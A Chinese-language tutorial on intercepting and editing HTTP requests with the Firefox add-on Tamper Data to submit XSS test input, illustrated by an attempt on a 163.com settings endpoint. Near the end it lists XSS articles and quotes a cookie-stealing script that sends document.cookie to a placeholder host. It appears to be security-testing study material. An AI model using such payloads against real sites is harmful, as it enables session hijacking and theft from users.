使用Tamper Data 提交XSS攻击数据
一. 简介
作为 Firefox 的插件, Tamper Data 简单易用,功能强大,可以用来查看和修改 HTTP/HTTPS 的头部和 POST 参数,模型web攻击;可以用来跟踪 HTTP 请求和响应并记时;
二. 使用
Tamper提供请求监控和修改功能
2.1 请求监听
工具页面分为:
监控窗口:
firefox所有tab打开网页发送的 HTTP 请求及其对应的响应都会被 Tamper Data 监控下来(默认状态)
左下角窗口为每个请求的头信息。类似Firebug。
右下角窗口为每个请求的返回头信息,类似Firebug。请求返回的详细信息,要通过鼠标右键 点击http请求-view source来显示。
注:Filter 可以只显示指定域名的请求。
2.2 拦截请求
在点击Start Tempar之后,会弹窗:
点击Tamper:
右键,可以:添加新的请求参数、请求头,在参数名上右键,可以弹出菜单,其中有 xss/sql/data 选项,xss有预定义xss script脚本。或者直接修改 参数对应的value。点击确定之后,就会提交请求。
XSS攻击示例
对接口,自定义皮肤:http://t.163.com/user.do?action=updateUserConfig进行非法数据提交(xss)
Start Tamper,点击页面的保存按钮。
会弹窗:
"Tamper"操作:
修改为:
提交之后:
服务器返回555,后台禁止 非法数据提交。
原理:
三. Tamper Option
默认不支持图片拦截,可以在Option选项中启用。Context Menu也可以添加一些自定义数据。
四. XSS介绍
http://hi.baidu.com/jinuyasha/blog/item/eb38b91801bcf9ed1ad576a6.html 浅谈反射型XSS的利用
http://huaidan.org/archives/2561.html 基于CSRF的XSS攻击
http://huaidan.org/archives/2450.html Anehta -- Boomerang(回旋镖),如何将反射型XSS变成持久型XSS:论跨域获取cookie
http://huaidan.org/archives/674.html XSS攻击Cookie欺骗中隐藏JavaScript执行
http://t.163.com/nathanliu#!javascript:alert(document.cookie); 如果url中是这样的脚本:document.location='http://URL.com/cookie.php?cookie='+escape(document.cookie)
http://www.cnblogs.com/jonniexie/articles/1761813.html 【WebGoat笔记】之四 --- Cross-Site Scripting (XSS) CSRF
http://www.4shell.org/archives/468.html Anehta -- 新一代的web攻击平台
http://huaidan.org/archives/650.html 在XSS中如何再插JS(解决方案,用户输入img src的时候要验证src的http格式)
http://baike.baidu.com/view/2161269.htm XSS攻击
xss攻击常用符号:
[1] <>(尖括号)
[2] "(引号)
[3] '(单引号)
[4] %(百分比符号)
[5] ;(分号)
[6] ()(括号)
[7] &(& 符号)
[8] +(加号)